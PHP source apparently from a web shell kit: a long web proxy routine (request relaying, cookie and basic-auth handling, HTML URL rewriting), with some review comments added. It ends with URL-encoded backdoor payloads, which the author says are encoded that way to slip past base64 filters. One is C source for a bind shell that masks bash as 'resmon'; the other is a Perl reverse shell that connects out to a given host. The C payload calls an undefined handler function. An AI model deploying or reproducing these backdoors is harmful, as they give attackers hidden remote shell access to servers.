else if (isset($_GET['action']) && $_GET['action'] == 'cookies')
{
show_report(array('which' => 'cookies'));
}
else
{
show_report(array('which' => 'index', 'category' => 'entry_form'));
}

if (isset($_GET[$_config['url_var_name']], $_POST[$_config['basic_auth_var_name']], $_POST['username'], $_POST['password']))
{
$_request_method = 'GET';
$_basic_auth_realm = base64_decode($_POST[$_config['basic_auth_var_name']]);
$_basic_auth_header = base64_encode($_POST['username'] . ':' . $_POST['password']);
}


if (strpos($_url, '://') === false)
{
$_url = 'http://' . $_url;
}

if (url_parse($_url, $_url_parts))
{
$_base = $_url_parts;

if (!empty($_hosts))
{
foreach ($_hosts as $host)
{
if (preg_match($host, $_url_parts['host']))
{
show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 1));
}
}
}
}
else
{
show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 2));
}


if (!$_config['allow_hotlinking'] && isset($_SERVER['HTTP_REFERER']))
{
$_hotlink_domains[] = $_http_host;
$is_hotlinking = true;

foreach ($_hotlink_domains as $host)
{
if (preg_match('#^https?\:\/\/(www)?\Q' . $host . '\E(\/|\$)#i', trim($_SERVER['HTTP_REFERER'])))
{
$is_hotlinking = false;
break;
}
}

if ($is_hotlinking)
{
switch ($_config['upon_hotlink'])
{
case 1:
show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'hotlinking'));
break;
case 2:
header('HTTP/1.0 404 Not Found');
exit(0);
default:
header('Location: ' . $_config['upon_hotlink'] . "?go=proxyx");
exit(0);
}
}
}


do
{
$_retry = false;
$_socket = @fsockopen(($_url_parts['scheme'] === 'https' && $_system['ssl'] ? 'ssl://' : 'tcp://') . $_url_parts['host'], $_url_parts['port'], $err_no, $err_str, 30);

if ($_socket === false)
{
show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'internal', 'error' => $err_no));
}
$_request_headers = $_request_method . ' ' . $_url_parts['path'];

if (isset($_url_parts['query']))
{
$_request_headers .= '?';
$query = preg_split('#([&;])#', $_url_parts['query'], -1, PREG_SPLIT_DELIM_CAPTURE);
for ($i = 0, $count = count($query); $i < $count; $_request_headers .= implode('=', array_map('urlencode', array_map('urldecode', explode('=', $query[$i])))) . (isset($query[++$i]) ? $query[$i] : ''), $i++);
}

$_request_headers .= " HTTP/1.0\r\n";
$_request_headers .= 'Host: ' . $_url_parts['host'] . $_url_parts['port_ext'] . "\r\n";

if (isset($_SERVER['HTTP_USER_AGENT']))
{
$_request_headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
}
if (isset($_SERVER['HTTP_ACCEPT']))
{
$_request_headers .= 'Accept: ' . $_SERVER['HTTP_ACCEPT'] . "\r\n";
}
else
{
$_request_headers .= "Accept: */*;q=0.1\r\n";
}
if ($_flags['show_referer'] && isset($_SERVER['HTTP_REFERER']) && preg_match('#^\Q' . $_script_url . '?' . $_config['url_var_name'] . '=\E([^&]+)#', $_SERVER['HTTP_REFERER'], $matches))
{
$_request_headers .= 'Referer: ' . decode_url($matches[1]) . "\r\n";
}
if (!empty($_COOKIE))
{
$_cookie = '';
$_auth_creds = array();

foreach ($_COOKIE as $cookie_id => $cookie_content)
{
$cookie_id = explode(';', @rawurldecode($cookie_id));
$cookie_content = explode(';', @rawurldecode($cookie_content));

if ($cookie_id[0] === 'COOKIE')
{
$cookie_id[3] = str_replace('_', '.', $cookie_id[3]);

if (count($cookie_id) < 4 || ($cookie_content[1] == 'secure' && $_url_parts['scheme'] != 'https'))
{
continue;
}

if ((preg_match('#\Q' . $cookie_id[3] . '\E$#i', $_url_parts['host']) || strtolower($cookie_id[3]) == strtolower('.' . $_url_parts['host'])) && preg_match('#^\Q' . $cookie_id[2] . '\E#', $_url_parts['path']))
{
$_cookie .= ($_cookie != '' ? '; ' : '') . (empty($cookie_id[1]) ? '' : $cookie_id[1] . '=') . $cookie_content[0];
}
}
else if ($cookie_id[0] === 'AUTH' && count($cookie_id) === 3)
{
$cookie_id[2] = str_replace('_', '.', $cookie_id[2]);

if ($_url_parts['host'] . ':' . $_url_parts['port'] === $cookie_id[2])
{
$_auth_creds[$cookie_id[1]] = $cookie_content[0];
}
}
}

if ($_cookie != '')
{
$_request_headers .= "Cookie: $_cookie\r\n";
}
}
if (isset($_url_parts['user'], $_url_parts['pass']))
{
$_basic_auth_header = base64_encode($_url_parts['user'] . ':' . $_url_parts['pass']);
}
if (!empty($_basic_auth_header))
{
$_set_cookie[] = add_cookie("AUTH;{$_basic_auth_realm};{$_url_parts['host']}:{$_url_parts['port']}", $_basic_auth_header);
$_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n";
}
else if (!empty($_basic_auth_realm) && isset($_auth_creds[$_basic_auth_realm]))
{
$_request_headers .= "Authorization: Basic {$_auth_creds[$_basic_auth_realm]}\r\n";
}
else if (list($_basic_auth_realm, $_basic_auth_header) = each($_auth_creds))
{
$_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n";
}
if ($_request_method == 'POST')
{
if (!empty($_FILES) && $_system['uploads'])
{
$_data_boundary = '----' . md5(uniqid(rand(), true));
$array = set_post_vars($_POST);

foreach ($array as $key => $value)
{
$_post_body .= "--{$_data_boundary}\r\n";
$_post_body .= "Content-Disposition: form-data; name=\"$key\"\r\n\r\n";
$_post_body .= urldecode($value) . "\r\n";
}

$array = set_post_files($_FILES);

foreach ($array as $key => $file_info)
{
$_post_body .= "--{$_data_boundary}\r\n";
$_post_body .= "Content-Disposition: form-data; name=\"$key\"; filename=\"{$file_info['name']}\"\r\n";
$_post_body .= 'Content-Type: ' . (empty($file_info['type']) ? 'application/octet-stream' : $file_info['type']) . "\r\n\r\n";

if (is_readable($file_info['tmp_name']))
{
$handle = fopen($file_info['tmp_name'], 'rb');
$_post_body .= fread($handle, filesize($file_info['tmp_name']));
fclose($handle);
}

$_post_body .= "\r\n";
}

$_post_body .= "--{$_data_boundary}--\r\n";
$_request_headers .= "Content-Type: multipart/form-data; boundary={$_data_boundary}\r\n";
$_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n";
$_request_headers .= $_post_body;
}
else
{
$array = set_post_vars($_POST);

foreach ($array as $key => $value)
{
$_post_body .= !empty($_post_body) ? '&' : '';
$_post_body .= $key . '=' . $value;
}
$_request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n";
$_request_headers .= $_post_body;
$_request_headers .= "\r\n";
}

$_post_body = '';
}
else
{
$_request_headers .= "\r\n";
}

fwrite($_socket, $_request_headers);


$_response_headers = $_response_keys = array();

$line = fgets($_socket, 8192);

while (strspn($line, "\r\n") !== strlen($line))
{
@list($name, $value) = explode(':', $line, 2);
$name = trim($name);
$_response_headers[strtolower($name)][] = trim($value);
$_response_keys[strtolower($name)] = $name;
$line = fgets($_socket, 8192);
}

sscanf(current($_response_keys), '%s %s', $_http_version, $_response_code);

if (isset($_response_headers['content-type']))
{
list($_content_type, ) = explode(';', str_replace(' ', '', strtolower($_response_headers['content-type'][0])), 2);
}
if (isset($_response_headers['content-length']))
{
$_content_length = $_response_headers['content-length'][0];
unset($_response_headers['content-length'], $_response_keys['content-length']);
}
if (isset($_response_headers['content-disposition']))
{
$_content_disp = $_response_headers['content-disposition'][0];
unset($_response_headers['content-disposition'], $_response_keys['content-disposition']);
}
if (isset($_response_headers['set-cookie']) && $_flags['accept_cookies'])
{
foreach ($_response_headers['set-cookie'] as $cookie)
{
$name = $value = $expires = $path = $domain = $secure = $expires_time = '';

preg_match('#^\s*([^,\s]*)\s*=?\s*([^;]*)#', $cookie, $match) && list(, $name, $value) = $match;
preg_match('#;\s*expires\s*=\s*([^;]*)#i', $cookie, $match) && list(, $expires) = $match;
preg_match('#;\s*path\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $path) = $match;
preg_match('#;\s*domain\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $domain) = $match;
preg_match('#;\s*(secure\#i', $cookie, $match) && list(, $secure) = $match;

$expires_time = empty($expires) ? 0 : intval(@strtotime($expires));
$expires = ($_flags['session_cookies'] && !empty($expires) && time()-$expires_time < 0) ? '' : $expires;
$path = empty($path) ? '/' : $path;

if (empty($domain))
{
$domain = $_url_parts['host'];
}
else
{
$domain = '.' . strtolower(str_replace('..', '.', trim($domain, '.')));

if ((!preg_match('#\Q' . $domain . '\E$#i', $_url_parts['host']) && $domain != '.' . $_url_parts['host']) || (substr_count($domain, '.') < 2 && $domain{0} == '.'))
{
continue;
}
}
if (count($_COOKIE) >= 15 && time()-$expires_time <= 0)
{
$_set_cookie[] = add_cookie(current($_COOKIE), '', 1);
}

$_set_cookie[] = add_cookie("COOKIE;$name;$path;$domain", "$value;$secure", $expires_time);
}
}
if (isset($_response_headers['set-cookie']))
{
unset($_response_headers['set-cookie'], $_response_keys['set-cookie']);
}
if (!empty($_set_cookie))
{
$_response_keys['set-cookie'] = 'Set-Cookie';
$_response_headers['set-cookie'] = $_set_cookie;
}
if (isset($_response_headers['p3p']) && preg_match('#policyref\s*=\s*[\'"]?([^\'"\s]*)[\'"]?#i', $_response_headers['p3p'][0], $matches))
{
$_response_headers['p3p'][0] = str_replace($matches[0], 'policyref="' . complete_url($matches[1]) . '"', $_response_headers['p3p'][0]);
}
if (isset($_response_headers['refresh']) && preg_match('#([0-9\s]*;\s*URL\s*=)\s*(\S*)#i', $_response_headers['refresh'][0], $matches))
{
$_response_headers['refresh'][0] = $matches[1] . complete_url($matches[2]);
}
if (isset($_response_headers['location']))
{
$_response_headers['location'][0] = complete_url($_response_headers['location'][0]);
}
if (isset($_response_headers['uri']))
{
$_response_headers['uri'][0] = complete_url($_response_headers['uri'][0]);
}
if (isset($_response_headers['content-location']))
{
$_response_headers['content-location'][0] = complete_url($_response_headers['content-location'][0]);
}
if (isset($_response_headers['connection']))
{
unset($_response_headers['connection'], $_response_keys['connection']);
}
if (isset($_response_headers['keep-alive']))
{
unset($_response_headers['keep-alive'], $_response_keys['keep-alive']);
}
if ($_response_code == 401 && isset($_response_headers['www-authenticate']) && preg_match('#basic\s+(?:realm="(.*?)")?#i', $_response_headers['www-authenticate'][0], $matches))
{
if (isset($_auth_creds[$matches[1]]) && !$_quit)
{
$_basic_auth_realm = $matches[1];
$_basic_auth_header = '';
$_retry = $_quit = true;
}
else
{
show_report(array('which' => 'index', 'category' => 'auth', 'realm' => $matches[1]));
}
}
}
while ($_retry);


/*
 * Pass-through branch: runs when the upstream Content-Type has no entry in
 * $_proxify (filled in outside this span). The upstream body is streamed to the
 * client unmodified and the script then exits, so nothing after this block runs
 * for such responses.
 */
if (!isset($_proxify[$_content_type]))
{
/* Remove PHP's execution time limit for the transfer; @ hides the warning if the call is not permitted. */
@set_time_limit(0);

/*
 * Reuse the upstream Content-Disposition when $_content_disp is non-empty,
 * otherwise build one from the file name of the requested URL.
 * NOTE(review): $_url_parts['file'] is placed inside the quoted filename
 * without escaping in this span; confirm what url_parse() allows in it.
 */
$_response_keys['content-disposition'] = 'Content-Disposition';
$_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp;

if ($_content_length !== false)
{
/* The size cap applies only when max_file_size is not -1; show_report() is defined elsewhere and presumably ends the request. */
if ($_config['max_file_size'] != -1 && $_content_length > $_config['max_file_size'])
{
show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'file_size'));
}

$_response_keys['content-length'] = 'Content-Length';
$_response_headers['content-length'][0] = $_content_length;
}

/* Drop entries whose value is empty/falsy so they are not emitted. */
$_response_headers = array_filter($_response_headers);
$_response_keys = array_filter($_response_keys);

/*
 * The first element of $_response_keys is sent as a raw header line and its
 * counterpart in $_response_headers is discarded.
 * NOTE(review): presumably this is the upstream status line; confirm where the
 * two arrays are populated.
 */
header(array_shift($_response_keys));
array_shift($_response_headers);

/* Relay every remaining header; the false argument keeps repeated names (for example several Set-Cookie lines) instead of replacing them. */
foreach ($_response_headers as $name => $array)
{
foreach ($array as $value)
{
header($_response_keys[$name] . ': ' . $value, false);
}
}

/* Copy the socket to the client in reads of up to 8192 bytes until a read yields no first byte. */
do
{
$data = fread($_socket, 8192);
echo $data;
}
while (isset($data{0}));

fclose($_socket);
exit(0);
}

/*
 * Rewrite path: read the whole upstream response into $_response_body so it can
 * be edited before it is sent. No size limit is enforced in this loop; the only
 * max_file_size check visible in this part of the file sits in the
 * pass-through branch. @ suppresses read warnings from fread().
 */
do
{
$data = @fread($_socket, 8192);
$_response_body .= $data;
}
while (isset($data{0}));

/* Release the last chunk and close the upstream connection. */
unset($data);
fclose($_socket);

if ($_content_type == 'text/css')
{
$_response_body = proxify_css($_response_body);
}
else
{
/*
 * Optional content stripping driven by per-request flags. These are regex
 * passes over the whole buffered document, so they are best-effort filters and
 * not an HTML sanitizer; markup the patterns do not anticipate passes through.
 */
/* strip_title: keep the <title> tags but empty their contents ('$1$3' drops the middle group). */
if ($_flags['strip_title'])
{
$_response_body = preg_replace('#(<\s*title[^>]*>)(.*?)(<\s*/title[^>]*>)#is', '$1$3', $_response_body);
}
if ($_flags['remove_scripts'])
{
/* Remove whole <script> elements. */
$_response_body = preg_replace('#<\s*script[^>]*?>.*?<\s*/\s*script\s*>#si', '', $_response_body);
/* Remove on<name>= attributes with their value; the pattern is not limited to text inside tags. */
$_response_body = preg_replace("#(\bon[a-z]+)\s*=\s*(?:\"([^\"]*)\"?|'([^']*)'?|([^'\"\s>]*))?#i", '', $_response_body);
/* Unwrap <noscript> so its fallback content is shown. */
$_response_body = preg_replace('#<noscript>(.*?)</noscript>#si', "$1", $_response_body);
}
/* show_images off: delete <img> and <image> tags. */
if (!$_flags['show_images'])
{
$_response_body = preg_replace('#<(img|image)[^>]*?>#si', '', $_response_body);
}


/*
 * Map of lower-case tag name => attributes that can carry a URL. The tag loop
 * later in the file rewrites a tag only if its name is a key here. For tags
 * that have their own case in that loop's switch (a, img, form, base, meta,
 * head, applet, object, param, frame, iframe) only the key matters; the
 * attribute list is iterated only by the switch's default case.
 */
$tags = array
(
'a' => array('href'),
'img' => array('src', 'longdesc'),
'image' => array('src', 'longdesc'),
'body' => array('background'),
'base' => array('href'),
'frame' => array('src', 'longdesc'),
'iframe' => array('src', 'longdesc'),
'head' => array('profile'),
'layer' => array('src'),
'input' => array('src', 'usemap'),
'form' => array('action'),
'area' => array('href'),
'link' => array('href', 'src', 'urn'),
'meta' => array('content'),
'param' => array('value'),
'applet' => array('codebase', 'code', 'object', 'archive'),
'object' => array('usermap', 'codebase', 'classid', 'archive', 'data'),
'script' => array('src'),
'select' => array('src'),
'hr' => array('src'),
'table' => array('background'),
'tr' => array('background'),
'th' => array('background'),
'td' => array('background'),
'bgsound' => array('src'),
'blockquote' => array('cite'),
'del' => array('cite'),
'embed' => array('src'),
'fig' => array('src', 'imagemap'),
'ilayer' => array('src'),
'ins' => array('cite'),
'note' => array('src'),
'overlay' => array('src', 'imagemap'),
'q' => array('cite'),
'ul' => array('src')
);

/*
 * Rewrite the contents of every <style> element: group 1 is the opening tag,
 * group 2 the CSS text, group 3 the closing tag. proxify_css() is defined
 * elsewhere in the file.
 */
preg_match_all('#(<\s*style[^>]*>)(.*?)(<\s*/\s*style[^>]*>)#is', $_response_body, $matches, PREG_SET_ORDER);

for ($i = 0, $count_i = count($matches); $i < $count_i; ++$i)
{
/* str_replace() substitutes every occurrence of the matched text, not only the one at this match's position. */
$_response_body = str_replace($matches[$i][0], $matches[$i][1]. proxify_css($matches[$i][2]) .$matches[$i][3], $_response_body);
}

/*
 * Rewrite URL-bearing attributes tag by tag. Every "<name ...>" opening tag in
 * the buffered body is matched, its attributes are parsed with a second regex,
 * and tags whose attributes were changed are rebuilt and substituted back into
 * $_response_body. complete_url(), encode_url(), url_parse() and
 * proxify_inline_css() are defined elsewhere in the file; from their use here
 * complete_url() presumably returns a proxied form of its argument — confirm
 * against its definition.
 */
preg_match_all("#<\s*([a-zA-Z\?-]+)([^>]+)>#S", $_response_body, $matches);

for ($i = 0, $count_i = count($matches[0]); $i < $count_i; ++$i)
{
/* Split the attribute text into name / value triples; skip the tag when nothing parses. */
if (!preg_match_all("#([a-zA-Z\-\/]+)\s*(?:=\s*(?:\"([^\">]*)\"?|'([^'>]*)'?|([^'\"\s]*)))?#S", $matches[2][$i], $m, PREG_SET_ORDER))
{
continue;
}

$rebuild = false;
$extra_html = $temp = '';
$attrs = array();

/*
 * Body-less loop that fills $attrs (lower-cased name => value). The value is
 * taken from the unquoted group if set, else the single-quoted group, else the
 * double-quoted group; an attribute with no value is stored as false.
 */
for ($j = 0, $count_j = count($m); $j < $count_j; $attrs[strtolower($m[$j][1])] = (isset($m[$j][4]) ? $m[$j][4] : (isset($m[$j][3]) ? $m[$j][3] : (isset($m[$j][2]) ? $m[$j][2] : false))), ++$j);

/* Inline style attributes are rewritten for any tag, whether or not it is listed in $tags. */
if (isset($attrs['style']))
{
$rebuild = true;
$attrs['style'] = proxify_inline_css($attrs['style']);
}

$tag = strtolower($matches[1][$i]);

if (isset($tags[$tag]))
{
switch ($tag)
{
case 'a':
if (isset($attrs['href']))
{
$rebuild = true;
$attrs['href'] = complete_url($attrs['href']);
}
break;
case 'img':
if (isset($attrs['src']))
{
$rebuild = true;
$attrs['src'] = complete_url($attrs['src']);
}
if (isset($attrs['longdesc']))
{
$rebuild = true;
$attrs['longdesc'] = complete_url($attrs['longdesc']);
}
break;
case 'form':
if (isset($attrs['action']))
{
$rebuild = true;

/* An empty action means "submit to the current page", so substitute the current upstream path. */
if (trim($attrs['action']) === '')
{
$attrs['action'] = $_url_parts['path'];
}
/*
 * GET forms (or forms with no method): the action is blanked and the
 * real target travels in a hidden field named by
 * $_config['get_form_name']; the break leaves the switch here.
 */
if (!isset($attrs['method']) || strtolower(trim($attrs['method'])) === 'get')
{
$extra_html = '<input type="hidden" name="' . $_config['get_form_name'] . '" value="' . encode_url(complete_url($attrs['action'], false)) . '" />';
$attrs['action'] = '';
break;
}

/* Any other method: point the action at the rewritten URL. */
$attrs['action'] = complete_url($attrs['action']);
}
break;
case 'base':
if (isset($attrs['href']))
{
$rebuild = true;
/* url_parse() receives $_base as its second argument; presumably it stores the parsed base URL there for later relative links — confirm. */
url_parse($attrs['href'], $_base);
$attrs['href'] = complete_url($attrs['href']);
}
break;
case 'meta':
/* strip_meta: remove named <meta> tags from the body altogether. */
if ($_flags['strip_meta'] && isset($attrs['name']))
{
$_response_body = str_replace($matches[0][$i], '', $_response_body);
}
/* Meta refresh: keep the delay prefix and rewrite the target URL. */
if (isset($attrs['http-equiv'], $attrs['content']) && preg_match('#\s*refresh\s*#i', $attrs['http-equiv']))
{
if (preg_match('#^(\s*[0-9]*\s*;\s*url=)(.*)#i', $attrs['content'], $content))
{
$rebuild = true;
$attrs['content'] = $content[1] . complete_url(trim($content[2], '"\''));
}
}
break;
case 'head':
if (isset($attrs['profile']))
{
$rebuild = true;
/* profile is a space-separated URL list; rewrite each entry. */
$attrs['profile'] = implode(' ', array_map('complete_url', explode(' ', $attrs['profile'])));
}
break;
case 'applet':
/* codebase: save $_base in $temp, switch $_base to the codebase URL for this tag's other attributes, and drop the attribute itself. */
if (isset($attrs['codebase']))
{
$rebuild = true;
$temp = $_base;
url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base);
unset($attrs['codebase']);
}
/* code is rewritten only when it contains a slash. */
if (isset($attrs['code']) && strpos($attrs['code'], '/') !== false)
{
$rebuild = true;
$attrs['code'] = complete_url($attrs['code']);
}
if (isset($attrs['object']))
{
$rebuild = true;
$attrs['object'] = complete_url($attrs['object']);
}
if (isset($attrs['archive']))
{
$rebuild = true;
/* For applet, archive is split on commas. */
$attrs['archive'] = implode(',', array_map('complete_url', preg_split('#\s*,\s*#', $attrs['archive'])));
}
/* Restore the base saved before the codebase switch. */
if (!empty($temp))
{
$_base = $temp;
}
break;
case 'object':
if (isset($attrs['usemap']))
{
$rebuild = true;
$attrs['usemap'] = complete_url($attrs['usemap']);
}
/* Same temporary $_base switch as in the applet case. */
if (isset($attrs['codebase']))
{
$rebuild = true;
$temp = $_base;
url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base);
unset($attrs['codebase']);
}
if (isset($attrs['data']))
{
$rebuild = true;
$attrs['data'] = complete_url($attrs['data']);
}
/* classid values starting with "clsid:" are left untouched. */
if (isset($attrs['classid']) && !preg_match('#^clsid:#i', $attrs['classid']))
{
$rebuild = true;
$attrs['classid'] = complete_url($attrs['classid']);
}
if (isset($attrs['archive']))
{
$rebuild = true;
/* For object, archive is split on spaces. */
$attrs['archive'] = implode(' ', array_map('complete_url', explode(' ', $attrs['archive'])));
}
if (!empty($temp))
{
$_base = $temp;
}
break;
case 'param':
/* Only valuetype="ref" params whose value starts with a scheme:// prefix are rewritten. */
if (isset($attrs['valuetype'], $attrs['value']) && strtolower($attrs['valuetype']) == 'ref' && preg_match('#^[\w.+-]+://#', $attrs['value']))
{
$rebuild = true;
$attrs['value'] = complete_url($attrs['value']);
}
break;
case 'frame':
case 'iframe':
if (isset($attrs['src']))
{
$rebuild = true;
/*
 * Framed documents get "&nf=1&go=proxyx" appended. The form-injection
 * code later in the file skips its address bar when $_GET['nf'] is
 * set. Both parameter names are fixed strings and therefore show up
 * in request URLs recorded by the web server.
 */
$attrs['src'] = complete_url($attrs['src']) . '&nf=1&go=proxyx';
}
if (isset($attrs['longdesc']))
{
$rebuild = true;
$attrs['longdesc'] = complete_url($attrs['longdesc']);
}
break;
default:
/* Tags without a dedicated case: rewrite each attribute listed for the tag in $tags. */
foreach ($tags[$tag] as $attr)
{
if (isset($attrs[$attr]))
{
$rebuild = true;
$attrs[$attr] = complete_url($attrs[$attr]);
}
}
break;
}
}

/*
 * Re-serialize a changed tag. Attribute values are concatenated as-is, with no
 * HTML escaping; only the quote character is chosen per value.
 * NOTE(review): strpos() returns 0 for a match at offset 0, which these
 * truthiness tests treat the same as "not found".
 */
if ($rebuild)
{
$new_tag = "<$tag";
foreach ($attrs as $name => $value)
{
$delim = strpos($value, '"') && !strpos($value, "'") ? "'" : '"';
$new_tag .= ' ' . $name . ($value !== false ? '=' . $delim . $value . $delim : '');
}

/* Every occurrence of the original tag text in the body is replaced, followed by any hidden input built for a GET form. */
$_response_body = str_replace($matches[0][$i], $new_tag . '>' . $extra_html, $_response_body);
}
}

/*
 * Inject an address bar at the top of the proxied page unless the request
 * carries "nf" (set on framed documents by the tag rewriting above).
 * The form posts back to $_script_url with the fixed query string
 * "?go=proxyx".
 * NOTE(review): $_url, $_script_url, $_script_base and the label text are
 * concatenated into HTML without escaping in this span; whether they were
 * encoded earlier is not visible here.
 */
if ($_flags['include_form'] && !isset($_GET['nf']))
{
$_url_form = '<div style="width:100%;margin:0;text-align:center;border-bottom:1px solid #725554;color:#000000;background-color:#F2FDF3;font-size:12px;font-weight:bold;font-family:Bitstream Vera Sans,arial,sans-serif;padding:4px;">'
. '<form method="post" action="' . $_script_url . '?go=proxyx">'
. ' <label for="____' . $_config['url_var_name'] . '"><a href="' . $_url . '">Address</a>:</label> <input id="____' . $_config['url_var_name'] . '" type="text" size="80" name="' . $_config['url_var_name'] . '" value="' . $_url . '" />'
. ' <input type="submit" name="go" value="Go" />'
. ' [go: <a href="' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_url_parts['prev_dir']) .' ">up one dir</a>, <a href="' . $_script_base . '">main page</a>]'
. '<br /><hr />';

/* One checkbox per flag that is not marked frozen in $_frozen_flags. */
foreach ($_flags as $flag_name => $flag_value)
{
if (!$_frozen_flags[$flag_name])
{
$_url_form .= '<label><input type="checkbox" name="' . $_config['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' /> ' . $_labels[$flag_name][0] . '</label> ';
}
}

$_url_form .= '</form></div>';
/* Insert the form right after the first <body ...> tag only (limit 1). $_url_form is part of the replacement string, so "$n" / "\n" reference sequences inside it would be interpreted by preg_replace(). */
$_response_body = preg_replace('#\<\s*body(.*?)\>#si', "$0\n$_url_form" , $_response_body, 1);
}
}

/*
 * Send the rewritten document. Content-Disposition is taken from upstream when
 * $_content_disp is non-empty, otherwise built from the requested file name
 * (unescaped inside the quotes, as in the pass-through branch above).
 */
$_response_keys['content-disposition'] = 'Content-Disposition';
$_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp;
/* Content-Length is recomputed from the rewritten body; strlen() counts bytes. */
$_response_keys['content-length'] = 'Content-Length';
$_response_headers['content-length'][0] = strlen($_response_body);
/* Drop entries whose value is empty/falsy so they are not emitted. */
$_response_headers = array_filter($_response_headers);
$_response_keys = array_filter($_response_keys);

/* First element of $_response_keys goes out as a raw header line (presumably the status line — confirm); its counterpart is discarded. */
header(array_shift($_response_keys));
array_shift($_response_headers);

/* Emit the remaining headers; false keeps repeated header names instead of replacing them. */
foreach ($_response_headers as $name => $array)
{
foreach ($array as $value)
{
header($_response_keys[$name] . ': ' . $value, false);
}
}

/* Output the body and end the request. */
echo $_response_body;
exit();
}
/* Nub servers now disable base64, So we'll use URLEncode, they disable that then i'll make my own encryption */
/*
 * NOTE(review): the three literals below are percent-encoded source text for
 * other languages, stored as data; nothing in these lines decodes, writes or
 * runs them.
 *  - $backdoor_c decodes to C source for a TCP listener that attaches accepted
 *    connections to a shell started under the process name "resmon".
 *  - $backdoor_perl decodes to a Perl script that connects out to a host and
 *    port taken from its arguments and runs a command over that socket.
 *  - $pl_scan decodes to a Perl TCP connect scanner over a port range.
 * Triage value: per the author's comment above, URL-encoding is chosen because
 * base64 is often disabled, so scanning rules keyed only on base64 blobs will
 * not flag this file. Long string literals in a .php file that begin with
 * "%23include" or "%23!%2Fusr%2Fbin%2Fperl" are a usable static indicator, as
 * is an unexpected shell process showing as "resmon" in process listings.
 */
$backdoor_c = "%23include%20%3Casm%2Fioctls.h%3E%0A%23include%20%3Csys%2Ftime.h%3E%0A%23include%20%3Csys%2Fselect.h%3E%0A%23include%20%3Cstdlib.h%3E%0A%23include%20%3Cunistd.h%3E%0A%23include%20%3Cerrno.h%3E%0A%23include%20%3Cstring.h%3E%0A%23include%20%3Cnetdb.h%3E%0A%23include%20%3Csys%2Ftypes.h%3E%0A%23include%20%3Cnetinet%2Fin.h%3E%0A%23include%20%3Csys%2Fsocket.h%3E%0A%23include%20%3Cstdint.h%3E%0A%23include%20%3Cpthread.h%3E%0Avoid%20*ClientHandler(void%20*client)%7B%0Aint%20fd%20%3D%20(int)client%3B%0Adup2(fd%2C%200)%3B%0Adup2(fd%2C%201)%3B%0Adup2(fd%2C%202)%3B%0Aif(fork()%20%3D%3D%200)%0Aexecl(%22%2Fbin%2Fbash%22%2C%20%22resmon%22%2C%200)%3B%0Aclose(fd)%3B%0Areturn%200%3B%0A%7D%0Aint%20main(int%20argc%2C%20char%20*argv%5B%5D)%0A%7B%0Aint%20rsk%2C%20csk%2C%20i%20%3D%201%3B%0Apthread_t%20thread%3B%0Astruct%20sockaddr%20saddr%3B%0Astruct%20sockaddr_in%20saddrIn%3B%0Aint%20p%3Datoi(argv%5B1%5D)%3B%0Aif((rsk%20%3D%20socket(AF_INET%2C%20SOCK_STREAM%2C%20IPPROTO_TCP))%20%3D%3D%20-1)%0Areturn%20-1%3B%0AsaddrIn.sin_family%09%09%3D%20AF_INET%3B%0AsaddrIn.sin_addr.s_addr%09%3D%20INADDR_ANY%3B%0AsaddrIn.sin_p%09%09%3D%20htons(p)%3B%0Amemcpy(%26saddr%2C%20%26saddrIn%2C%20sizeof(struct%20sockaddr_in))%3B%0Asetsockopt(rsk%2C%20SOL_SOCKET%2C%20SO_REUSEADDR%2C%20(char%20*)%26i%2C%20sizeof(i))%3B%0Aif(bind(rsk%2C%20%26saddr%2C%20sizeof(saddr))%20!%3D%200)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Aif(listen(rsk%2C%2010)%20%3D%3D%20-1)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Awhile(1)%7B%0Aif((csk%20%3D%20accept(rsk%2C%20NULL%2C%20NULL))%20!%3D%20-1)%7B%0Apthread_create(%26thread%2C%200%2C%20handler%2C%20(void%20*)csk)%3B%0A%7D%0A%7D%0Areturn%201%3B%0A%7D";
$backdoor_perl = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20Socket%3B%0Amy%20(%24iaddr%2C%24port%2C%24cmd)%3D%40ARGV%3B%0Amy%20%24paddr%3Dsockaddr_in(%24port%2C%20inet_aton(%24iaddr))%3B%0Amy%20%24proto%20%3D%20getprotobyname(%22tcp%22)%3B%0Asocket(SOCKET%2C%20PF_INET%2C%20SOCK_STREAM%2C%20%24proto)%3B%0Aconnect(SOCKET%2C%20%24paddr)%3B%0Aopen(STDOUT%2C%22%3E%26SOCKET%22)%3B%0Aopen(STDIN%2C%22%3E%26SOCKET%22)%3B%0Aprint%20SOCKET%20%22Shell%20test%5Cn%22%3B%0Aprint%20exec(%24cmd)%3B%0Aclose(STDIN)%3B%0Aclose(STDOUT)%3B";
